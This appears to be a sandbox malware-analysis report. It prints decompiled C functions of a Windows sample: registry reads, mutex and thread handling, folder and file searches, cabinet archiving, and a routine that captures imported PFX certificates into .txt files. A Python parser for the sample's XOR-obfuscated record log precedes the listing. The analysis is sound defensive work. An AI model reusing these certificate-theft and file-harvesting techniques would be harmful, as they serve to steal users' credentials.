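The listing above (E00416486) is the sample's record writer. Read off the decompilation: payloads above 0xA00000 bytes are refused; the current file position is saved (E0041583F wraps SetFilePointerEx with FILE_CURRENT); the handle is moved to the end (E0041581F with FILE_END) and that end position is saved as the rollback point; a 5-byte header is written consisting of one DWORD, the payload length XORed with the 32-bit field at offset 0x10 of the file object (__esi[4]), followed by one byte that is only ever zeroed; then the payload itself. If either WriteFile comes up short, the function seeks back to the old end and calls SetEndOfFile, so a partial record never stays on disk, and in all cases it flushes and restores the caller's original position. The Python below is an added example, not code from the sample or from Joe Sandbox: a writer that mirrors that logic and a parser for pulling records back out of such a file. The key value, the in-memory file and the payloads are constructed for the example; the fifth header byte is returned untouched rather than interpreted, since the listing gives no meaning for it.

```python
import io
import struct

# Constants as read from the decompilation of E00416486.
MAX_RECORD = 0xA00000   # if(_a8 <= 0xa00000): anything larger is refused
HEADER_LEN = 5          # memset(&_v20, 0, 5); DWORD (key ^ length) then one zero byte


def append_record(f, key: int, data: bytes) -> bool:
    """Append one record the way E00416486 does, rolling back on a short write.

    `f` is any seekable binary file object. `key` stands in for the 32-bit
    value the sample keeps at __esi[4]; its real value is not on the page and
    is an assumption of this example.
    """
    if len(data) > MAX_RECORD:
        return False
    orig_pos = f.tell()                       # first E0041583F: caller's position
    f.seek(0, io.SEEK_END)                    # E0041581F(..., 0, 0, FILE_END)
    end_pos = f.tell()                        # second E0041583F: rollback point
    header = struct.pack("<I", (key ^ len(data)) & 0xFFFFFFFF) + b"\x00"
    ok = False
    try:
        if f.write(header) == HEADER_LEN and f.write(data) == len(data):
            ok = True
        else:
            f.seek(end_pos)                   # back to the old end of file
            f.truncate()                      # SetEndOfFile: drop the partial record
    finally:
        f.flush()                             # FlushFileBuffers
        f.seek(orig_pos)                      # restore the caller's position
    return ok


def parse_records(blob: bytes, key: int) -> list:
    """Walk a file built by append_record; return (fifth_byte, payload) pairs.

    The only integrity check the format offers is the length: a wrong key
    turns the first header into an implausible size, which is reported.
    """
    records = []
    off = 0
    while off + HEADER_LEN <= len(blob):
        (obf_len,) = struct.unpack_from("<I", blob, off)
        length = obf_len ^ key
        fifth = blob[off + 4]
        off += HEADER_LEN
        if length > MAX_RECORD or off + length > len(blob):
            raise ValueError(f"bad length {length:#x} at offset {off - HEADER_LEN:#x}: wrong key or corrupt file")
        records.append((fifth, blob[off:off + length]))
        off += length
    if off != len(blob):
        raise ValueError(f"{len(blob) - off} trailing bytes after the last record")
    return records


def key_fits(blob: bytes, key: int) -> bool:
    """True if every header in `blob` decodes to a plausible length under `key`."""
    try:
        parse_records(blob, key)
        return True
    except ValueError:
        return False


def recover_key(blob: bytes) -> int:
    """Recover the XOR key from a file that holds exactly one record.

    The header stores key ^ len(payload) and the payload is everything after
    the header, so the key falls straight out. With several records this is
    only a candidate that parse_records() then accepts or rejects.
    """
    if len(blob) < HEADER_LEN:
        raise ValueError("file shorter than one header")
    (obf_len,) = struct.unpack_from("<I", blob, 0)
    return obf_len ^ (len(blob) - HEADER_LEN)
```

Run parse_records (or key_fits) over a carved file for each candidate key; an implausible length in the very first header rules a key out without touching the rest. recover_key applies only when the file holds a single record, which is what a freshly created log looks like.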

            C-Code - Quality: 100%
            			E00414526(void* __ecx, void* _a4, int _a8, short* _a12, int* _a16, char** _a20) {
            				int* _v8;
            				int _t30;
            				char* _t39;
            
            				_v8 = _v8 | 0xffffffff;
            				 *_a20 = 0;
            				if(RegOpenKeyExW(_a4, _a8, 0, 1,  &_a4) == 0) {
            					_a8 = 0;
            					if(RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_a8) == 0) {
            						_t30 = _a8;
            						if(_t30 != 0) {
            							_t31 = _t30 + 4;
            							if(_t30 + 4 != 0) {
            								_t39 = E004103ED(_t31);
            								if(_t39 == 0 || RegQueryValueExW(_a4, _a12, 0, _a16, _t39,  &_a8) != 0) {
            									goto L6;
            								} else {
            									 *_a20 = _t39;
            									_v8 = _a8;
            									goto L7;
            								}
            								goto L9;
            							} else {
            								_t39 = 0;
            								L6:
            								E00410418(_t39);
            							}
            							L7:
            						} else {
            							_v8 = 0;
            						}
            					}
            					RegCloseKey(_a4);
            				}
            				L9:
            				return _v8;
            			}






            0x0041452d
            0x00414534
            0x0041454b
            0x0041455c
            0x0041456a
            0x0041456c
            0x00414571
            0x00414578
            0x0041457e
            0x004145a0
            0x004145a4
            0x00000000
            0x004145bb
            0x004145be
            0x004145c3
            0x00000000
            0x004145c3
            0x00000000
            0x00414580
            0x00414580
            0x00414582
            0x00414583
            0x00414583
            0x00414588
            0x00414573
            0x00414573
            0x00414573
            0x00414571
            0x0041458c
            0x00414592
            0x00414593
            0x00414598

            APIs
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,0041A8D4,?,?,004060E9,80000001,0041A8F0,0041A8D4,?,00000000,?,?), ref: 00414543
            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,0041A8F0,?,?,004060E9,80000001,0041A8F0,0041A8D4,?,00000000), ref: 00414566
            • RegCloseKey.ADVAPI32(?,?,?,004060E9,80000001,0041A8F0,0041A8D4,?,00000000,?,?), ref: 0041458C
            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?,?,004060E9,80000001,0041A8F0,0041A8D4,?,00000000), ref: 004145B5
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: QueryValue$CloseOpen
            • String ID:
            • API String ID: 1586453840-0
            • Opcode ID: 91f1d17ac7605f1466c6c25126574d36372c29d81d4945ae1c6e528ce94f4bcc
            • Instruction ID: 6989f671629d0f7caa4ac4c80e0f605d7eb74c225a412cda5e40e4e1aaed18b9
            • Opcode Fuzzy Hash: 91f1d17ac7605f1466c6c25126574d36372c29d81d4945ae1c6e528ce94f4bcc
            • Instruction Fuzzy Hash: FF21367110021ABFDF119F96DC80DDE7BADEF487A4B008426FA1596220D375DA919BA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040479B(void* __eflags) {
            				void* _t1;
            				void* _t2;
            				void* _t3;
            				long _t6;
            				void* _t11;
            
            				_t1 = E00403D00(_t11, __eflags, 0x19367400, 1);
            				_t19 = _t1;
            				if(_t1 != 0) {
            					_t2 = E00403E39();
            					__eflags = _t2;
            					if(_t2 != 0) {
            						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
            						_t6 = WaitForSingleObject( *0x41a758, 0x1388);
            						while(1) {
            							__eflags = _t6 - 0x102;
            							if(_t6 != 0x102) {
            								goto L6;
            							}
            							E00404D06();
            							_t6 = WaitForSingleObject( *0x41a758, 0x1388);
            						}
            					}
            					L6:
            					E00413A4E(_t19);
            					_t3 = 0;
            					__eflags = 0;
            				} else {
            					_t3 = _t1 + 1;
            				}
            				return _t3;
            			}








            0x004047ac
            0x004047b1
            0x004047b5
            0x004047ba
            0x004047bf
            0x004047c1
            0x004047cc
            0x004047e4
            0x004047fb
            0x004047fb
            0x004047fd
            0x00000000
            0x00000000
            0x004047ed
            0x004047f9
            0x004047f9
            0x004047fb
            0x004047ff
            0x00404800
            0x00404805
            0x00404805
            0x004047b7
            0x004047b7
            0x004047b7
            0x0040480e

            APIs
              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • GetCurrentThread.KERNEL32 ref: 004047C5
            • SetThreadPriority.KERNEL32(00000000), ref: 004047CC
            • WaitForSingleObject.KERNEL32(00001388), ref: 004047E4
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
            • String ID:
            • API String ID: 3441234504-0
            • Opcode ID: cefb277c937685d59e69cb7621a9d7660eb2a1ae23493bde164298c4aada1f49
            • Instruction ID: 0381f2cfc366511f4e3e2031ecbc7e247120234e00cdc92cd1439fb03b7b308b
            • Opcode Fuzzy Hash: cefb277c937685d59e69cb7621a9d7660eb2a1ae23493bde164298c4aada1f49
            • Instruction Fuzzy Hash: D6F046B25041082AC6113B61AC04DAB3B8CCB86365B100237FA10F32E2DE798D0151BD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004139F3(HANDLE* _a4) {
            				struct tagMSG _v28;
            				long _t5;
            
            				while(1) {
            					_t5 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4bf);
            					if(_t5 != 1) {
            						break;
            					}
            					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
            						TranslateMessage( &_v28);
            						DispatchMessageW( &_v28);
            					}
            				}
            				return _t5;
            			}





            0x00413a35
            0x00413a3e
            0x00413a42
            0x00000000
            0x00000000
            0x00413a22
            0x00413a11
            0x00413a1c
            0x00413a1c
            0x00413a22
            0x00413a4b

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: MessageMultipleObjectsPeekWait
            • String ID:
            • API String ID: 3986374578-0
            • Opcode ID: 9b4ede3eabaa2c88267c43d3d158c22044a4909bde63cdc3dc8fccb5edfd2d8e
            • Instruction ID: a1d2323d88ffdfb6c30e1258e959ae11c6308d85b97c6630029b8f1318df6d2b
            • Opcode Fuzzy Hash: 9b4ede3eabaa2c88267c43d3d158c22044a4909bde63cdc3dc8fccb5edfd2d8e
            • Instruction Fuzzy Hash: 85F0B47250424D7FD700EF95DC88CA77BACFB453A9B04057EF650E2021D239D9084779
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00411A8A(intOrPtr _a4) {
            				intOrPtr _v20;
            				void* _v32;
            				signed int _t6;
            				signed int _t7;
            				int _t9;
            				int _t14;
            				void* _t15;
            
            				_t14 = 0;
            				_t6 = CreateToolhelp32Snapshot(4, 0);
            				_t15 = _t6;
            				_t7 = _t6 | 0xffffffff;
            				if(_t15 != _t7) {
            					_v32 = 0x1c;
            					_t9 = Thread32First(_t15,  &_v32);
            					while(_t9 != 0) {
            						if(_v20 == _a4) {
            							_t14 = _t14 + 1;
            						}
            						_t9 = Thread32Next(_t15,  &_v32);
            					}
            					CloseHandle(_t15);
            					return _t14;
            				}
            				return _t7;
            			}










            0x00411a92
            0x00411a97
            0x00411a9c
            0x00411a9e
            0x00411aa3
            0x00411aaa
            0x00411ab1
            0x00411acb
            0x00411abe
            0x00411ac0
            0x00411ac0
            0x00411ac6
            0x00411ac6
            0x00411ad0
            0x00000000
            0x00411ad6
            0x00411adb

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00411A97
            • Thread32First.KERNEL32 ref: 00411AB1
            • Thread32Next.KERNEL32 ref: 00411AC6
            • CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?,00000004,00000000,?), ref: 00411AD0
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID:
            • API String ID: 3643885135-0
            • Opcode ID: dd5aaa719eabed4c0d8e366c8073e18c46a89d2ee709b4e996d9339e0cc85680
            • Instruction ID: 76cf46a3d10d727609dafb8d14dacd50e79e5502b1b5babddc7362bfc74ace96
            • Opcode Fuzzy Hash: dd5aaa719eabed4c0d8e366c8073e18c46a89d2ee709b4e996d9339e0cc85680
            • Instruction Fuzzy Hash: EDF0AE719011156ADB20BFAB8C45EEF7BECDFC1394F014523FA11D2191D638E98286BD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 62%
            			E0040A1AD(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
            				char _v536;
            				char _v600;
            				char _v728;
            				char _v744;
            				struct _SYSTEMTIME _v760;
            				intOrPtr _v764;
            				intOrPtr _v772;
            				intOrPtr _v776;
            				char _v784;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t31;
            				void* _t47;
            				void* _t58;
            				intOrPtr* _t59;
            				void* _t61;
            				void* _t65;
            				intOrPtr* _t66;
            				void* _t67;
            				void* _t71;
            				char* _t74;
            				signed int _t76;
            				void* _t78;
            				void* _t79;
            
            				_t61 = __ecx;
            				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
            				_t31 = E00403E2A();
            				_t59 = _a4;
            				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
            				_v776 = _t31;
            				if(_t31 != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E00403E39() != 0) {
            					GetSystemTime( &_v760);
            					E0040F369(0x80,  &_v600);
            					_t74 =  &_v744;
            					E0040F369(0x81, _t74);
            					E00409F84( &_v536, _t61);
            					_push(_v760.wYear & 0x0000ffff);
            					_push(_v760.wMonth & 0x0000ffff);
            					_push(_v760.wDay & 0x0000ffff);
            					_push(_t74);
            					_push( &_v536);
            					_push( &_v600);
            					_t65 = 0x3e;
            					_t47 = E004111A5( &_v600, _t65,  &_v728);
            					_t79 = _t78 + 0x18;
            					if(_t47 > 0 && E0040D77B(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
            						_t66 = _a8;
            						if(_t66 != 0 &&  *_t66 != 0) {
            							 *((short*)(E00410454(_t79 + 0x48 + E00411098( &_v728) * 2, L".txt", 8) + 8)) = 0;
            							_t64 = _t66;
            							if(E004112C2(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
            								E0040D77B(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
            								E004112B2( &_v784);
            							}
            						}
            					}
            				}
            				return _v776;
            			}



























            0x0040a1ad
            0x0040a1b3
            0x0040a1bc
            0x0040a1c4
            0x0040a1cb
            0x0040a1d1
            0x0040a1d7
            0x0040a217
            0x0040a229
            0x0040a22e
            0x0040a237
            0x0040a243
            0x0040a24d
            0x0040a253
            0x0040a259
            0x0040a25c
            0x0040a264
            0x0040a26c
            0x0040a26f
            0x0040a274
            0x0040a279
            0x0040a27e
            0x0040a296
            0x0040a29b
            0x0040a2be
            0x0040a2c9
            0x0040a2d2
            0x0040a2e4
            0x0040a2e9
            0x0040a2e9
            0x0040a2d2
            0x0040a29b
            0x0040a27e
            0x0040a2f8

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
            • PFXImportCertStore.CRYPT32(?,?,?), ref: 0040A1CB
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • GetSystemTime.KERNEL32(?), ref: 0040A217
              • Part of subcall function 00409F84: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040A0E3), ref: 00409F99
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ObjectSingleWait$CertImportNameStoreSystemTimeUser
            • String ID: .txt
            • API String ID: 203043692-2195685702
            • Opcode ID: 77dedcb36bbc64d4f4f0c867b27b11ce3b841cc37004373050434c2adf8f31e5
            • Instruction ID: 672891c75741f4f1613b93bd345e85564aaa01e106414be4509369940d6857e0
            • Opcode Fuzzy Hash: 77dedcb36bbc64d4f4f0c867b27b11ce3b841cc37004373050434c2adf8f31e5
            • Instruction Fuzzy Hash: B5319F31100344AADB20EF65C941BAB77A8AF88304F00457FBE84E62D1DB79D998C75A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E00414033(intOrPtr _a4) {
            				void* _t26;
            				intOrPtr _t28;
            				intOrPtr* _t34;
            				intOrPtr* _t36;
            
            				_t34 = 0;
            				if(E00413F54() != 0) {
            					_t36 = HeapAlloc( *0x41bc68, 8, 0x954);
            					if(_t36 == 0) {
            						L7:
            						E00414012();
            					} else {
            						_t2 = _t36 + 0x53e; // 0x53e
            						if(E00415D45(0, _t2, _a4) == 0) {
            							L6:
            							E00410418(_t36);
            							goto L7;
            						} else {
            							_t3 = _t36 + 0x746; // 0x746
            							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t22 > 0x00000000) == 0) {
            								goto L6;
            							} else {
            								 *((intOrPtr*)(_t36 + 0x14)) = 0x7fffffff;
            								_t7 = _t36 + 0x10; // 0x10
            								 *_t7 = 0x7fffffff;
            								 *((intOrPtr*)(_t36 + 0x24)) = 1;
            								 *((intOrPtr*)(_t36 + 0x28)) = 1;
            								_t10 = _t36 + 0x132; // 0x132
            								E00410454(_t10, "cabinet.dll", 0xc);
            								_t11 = _t36 + 0x232; // 0x232
            								_t26 = E00410454(_t11, "?O", 2);
            								_t12 = _t36 + 4; // 0x4
            								_t28 =  *0x41bc60(_t12, E00413EBF, E00413B46, E00413B59, E00413CE5, E00413D1A, E00413D52, E00413D9A, E00413DC3, E00413E0F, E00413E47, _t26, _t36);
            								 *_t36 = _t28;
            								if(_t28 == 0) {
            									goto L6;
            								} else {
            									_t34 = _t36;
            								}
            							}
            						}
            					}
            				}
            				return _t34;
            			}







            0x00414034
            0x0041403d
            0x00414057
            0x0041405b
            0x00414127
            0x00414127
            0x00414061
            0x00414065
            0x00414075
            0x00414121
            0x00414122
            0x00000000
            0x0041407b
            0x0041407b
            0x00414094
            0x00000000
            0x0041409a
            0x0041409f
            0x004140a2
            0x004140a5
            0x004140ac
            0x004140af
            0x004140b7
            0x004140be
            0x004140ca
            0x004140d1
            0x00414105
            0x0041410e
            0x00414117
            0x0041411b
            0x00000000
            0x0041411d
            0x0041411d
            0x0041411d
            0x0041411b
            0x00414094
            0x00414075
            0x0041412c
            0x00414130

            APIs
              • Part of subcall function 00413F54: LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041403B,?,0041425F,?,?,00000000,?,?,?), ref: 00413F68
              • Part of subcall function 00413F54: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00413F88
              • Part of subcall function 00413F54: GetProcAddress.KERNEL32(FCIAddFile), ref: 00413F9A
              • Part of subcall function 00413F54: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00413FAC
              • Part of subcall function 00413F54: GetProcAddress.KERNEL32(FCIDestroy), ref: 00413FBE
              • Part of subcall function 00413F54: HeapCreate.KERNEL32(00000000,00080000,00000000,0041425F,?,?,00000000,?,?,?), ref: 00413FE9
              • Part of subcall function 00413F54: FreeLibrary.KERNEL32(0041425F,?,?,00000000,?,?,?), ref: 00413FFE
            • HeapAlloc.KERNEL32(00000008,00000954,?,?,0041425F,?,?,00000000,?,?,?), ref: 00414051
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • GetTempPathW.KERNEL32(00000103,00000746,0000053E,?,?,0041425F,?,?,00000000,?,?,?), ref: 00414087
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$HeapLibraryPath$AllocCombineCreateFreeLoadTemp
            • String ID: cabinet.dll
            • API String ID: 3425133823-741892446
            • Opcode ID: c379340c9199c6a65476d24d26ffd0dfbce50936c7474d0220a03d5ed2e205b0
            • Instruction ID: a4ac8e28487a97aeeac00623159ef3462fa1fb9ae2c9623b3f729f3daaf109d5
            • Opcode Fuzzy Hash: c379340c9199c6a65476d24d26ffd0dfbce50936c7474d0220a03d5ed2e205b0
            • Instruction Fuzzy Hash: 6B210571380700BBD7209F219C4AFD77798AB88B06F20442FB656A66D1DBBCD6C9875C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 63%
            			E004149F0(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
            				signed int _v14;
            				signed int _v16;
            				signed int _v20;
            				char _v284;
            				unsigned int _t24;
            				void* _t26;
            				signed int _t28;
            				signed int* _t29;
            				void* _t30;
            				void* _t41;
            				char* _t42;
            				void* _t45;
            				signed int _t46;
            				void* _t47;
            
            				_t45 = __ecx;
            				_t24 = E00410454( &_v20, _a4, 0x10);
            				_v20 = _v20 ^ _t24;
            				_v16 = _v16 ^ _t24;
            				_v14 = _v14 ^ _t24 >> 0x00000010;
            				_t41 = 0;
            				_t26 = 0;
            				do {
            					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
            					_t26 = _t26 + 1;
            					if(_t26 == 4) {
            						_t26 = 0;
            					}
            					_t41 = _t41 + 1;
            				} while (_t41 < 8);
            				if(_a12 != 0) {
            					E00410454( &_v284, _a12, 0x102);
            					E0041195B( &_v284, _t41,  &_v20, 0x10);
            				}
            				_t28 = _a16 & 0x000000ff;
            				if(_t28 != 0) {
            					_t30 = _t28 - 1;
            					if(_t30 == 0) {
            						_t42 = L"Local\\";
            						_push(6);
            						goto L11;
            					} else {
            						if(_t30 == 1) {
            							_t42 = L"Global\\";
            							_push(7);
            							L11:
            							_pop(_t46);
            							E004107C1(_t46, _t42, _t45);
            							_t45 = _t45 + _t46 * 2;
            						}
            					}
            				}
            				_t29 =  &_v20;
            				__imp__StringFromGUID2(_t29, _t45, 0x28);
            				return _t29;
            			}

















            0x00414a00
            0x00414a06
            0x00414a0b
            0x00414a0e
            0x00414a15
            0x00414a19
            0x00414a1b
            0x00414a1d
            0x00414a21
            0x00414a25
            0x00414a29
            0x00414a2b
            0x00414a2b
            0x00414a2d
            0x00414a2e
            0x00414a37
            0x00414a48
            0x00414a59
            0x00414a59
            0x00414a62
            0x00414a65
            0x00414a67
            0x00414a68
            0x00414a76
            0x00414a7b
            0x00000000
            0x00414a6a
            0x00414a6b
            0x00414a6d
            0x00414a72
            0x00414a7d
            0x00414a7d
            0x00414a82
            0x00414a87
            0x00414a87
            0x00414a6b
            0x00414a68
            0x00414a8d
            0x00414a91
            0x00414a9a

            APIs
            • StringFromGUID2.OLE32(00000000,0041A702,00000028,0040389F,?,00000010,?,00000000), ref: 00414A91
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: FromString
            • String ID: Global\$Local\
            • API String ID: 1694596556-639276846
            • Opcode ID: efbf727a9e3a9c53e6c25bf6df41ad7af4f6959fb8d7a51e40e01c6b647d84d4
            • Instruction ID: 33b5d4ce87c77fe6ef4b2d0465663e34297b108f7f0955cf64e03c164073db82
            • Opcode Fuzzy Hash: efbf727a9e3a9c53e6c25bf6df41ad7af4f6959fb8d7a51e40e01c6b647d84d4
            • Instruction Fuzzy Hash: 2F11383164010E56CB14DF748C46BEF3769EF80755F00842BE612E60C1DBB8D5C6CB98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E0040943D(void* __eflags) {
            				intOrPtr _v8;
            				char _v12;
            				char _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				char _v56;
            				char _v88;
            				char _v612;
            				void* __esi;
            				void* _t18;
            				char* _t23;
            				void* _t25;
            				signed int _t34;
            				char* _t35;
            				void* _t38;
            
            				_t35 =  &_v88;
            				_t18 = 0x6c;
            				E0040F369(_t18, _t35);
            				_v16 = _t35;
            				_v28 = 0x26;
            				_v24 = 0x1a;
            				_v20 = 0x23;
            				E004104CB( &_v12,  &_v12, 0, 8);
            				_t34 = 0;
            				do {
            					_t23 =  &_v612;
            					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t38 + _t34 * 4 - 0x18)), 0, 0, _t23);
            					_t41 = _t23;
            					if(_t23 == 0) {
            						_t33 =  &_v16;
            						E00415BE8( &_v612,  &_v16, _t41, 1, 2, E004091AC,  &_v12, 0, 0, 0);
            					}
            					_t34 = _t34 + 1;
            				} while (_t34 < 3);
            				_t43 = _v8;
            				if(_v8 > 0) {
            					_t37 =  &_v56;
            					_t25 = 0x6d;
            					E0040F369(_t25,  &_v56);
            					E0040D929(_t37, _v12, _t33, _t43, _t37);
            				}
            				return E00410418(_v12);
            			}

            0x0040944a
            0x0040944d
            0x0040944e
            0x00409457
            0x00409461
            0x00409468
            0x0040946f
            0x00409476
            0x0040947b
            0x0040947d
            0x0040947d
            0x0040948b
            0x00409491
            0x00409493
            0x004094a5
            0x004094ae
            0x004094ae
            0x004094b3
            0x004094b4
            0x004094b9
            0x004094bc
            0x004094c0
            0x004094c3
            0x004094c4
            0x004094cf
            0x004094cf
            0x004094df

            APIs
            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,00000003,00000000,00000008), ref: 0040948B
              • Part of subcall function 00415BE8: FindFirstFileW.KERNEL32(?,?,?,?,00000000,00000000,00000104), ref: 00415C27
              • Part of subcall function 00415BE8: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00415C4E
              • Part of subcall function 00415BE8: PathMatchSpecW.SHLWAPI(?,?), ref: 00415C99
              • Part of subcall function 00415BE8: Sleep.KERNEL32(00000000,?,?), ref: 00415CF6
              • Part of subcall function 00415BE8: FindNextFileW.KERNEL32(?,?), ref: 00415D24
              • Part of subcall function 00415BE8: FindClose.KERNEL32(?), ref: 00415D36
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePath$CloseFirstFolderMatchNextObjectSingleSleepSpecWait
            • String ID: #$&
            • API String ID: 1211921070-3870246384
            • Opcode ID: 2ba0d3462220a7a7dee2fbe7eecd2778a736630a2e98fcd42b198f65ee9cf9c8
            • Instruction ID: 4d00b4b4c2625f4448f9b85930361dfc247760f611046204eaa765bc3a8ad894
            • Opcode Fuzzy Hash: 2ba0d3462220a7a7dee2fbe7eecd2778a736630a2e98fcd42b198f65ee9cf9c8
            • Instruction Fuzzy Hash: 6A118C71E01228BADB20EAA2DC49FDF7F78EF41754F00406AB505B6181D3795A89CBE4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E00408AFE(void* __eflags) {
            				intOrPtr _v8;
            				char _v12;
            				char _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				char _v36;
            				char _v60;
            				char _v580;
            				void* __esi;
            				void* _t18;
            				char* _t23;
            				void* _t25;
            				signed int _t34;
            				char* _t35;
            				void* _t38;
            
            				_t35 =  &_v60;
            				_t18 = 0x58;
            				E0040F369(_t18, _t35);
            				_v16 = _t35;
            				_v28 = 0x26;
            				_v24 = 0x1a;
            				_v20 = 0x23;
            				E004104CB( &_v12,  &_v12, 0, 8);
            				_t34 = 0;
            				do {
            					_t23 =  &_v580;
            					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t38 + _t34 * 4 - 0x18)), 0, 0, _t23);
            					_t41 = _t23;
            					if(_t23 == 0) {
            						_t33 =  &_v16;
            						E00415BE8( &_v580,  &_v16, _t41, 1, 2, E00408853,  &_v12, 0, 0, 0);
            					}
            					_t34 = _t34 + 1;
            				} while (_t34 < 3);
            				_t43 = _v8;
            				if(_v8 > 0) {
            					_t37 =  &_v36;
            					_t25 = 0x59;
            					E0040F369(_t25,  &_v36);
            					E0040D929(_t37, _v12, _t33, _t43, _t37);
            				}
            				return E00410418(_v12);
            			}

            0x00408b0b
            0x00408b0e
            0x00408b0f
            0x00408b18
            0x00408b22
            0x00408b29
            0x00408b30
            0x00408b37
            0x00408b3c
            0x00408b3e
            0x00408b3e
            0x00408b4c
            0x00408b52
            0x00408b54
            0x00408b66
            0x00408b6f
            0x00408b6f
            0x00408b74
            0x00408b75
            0x00408b7a
            0x00408b7d
            0x00408b81
            0x00408b84
            0x00408b85
            0x00408b90
            0x00408b90
            0x00408ba0

            APIs
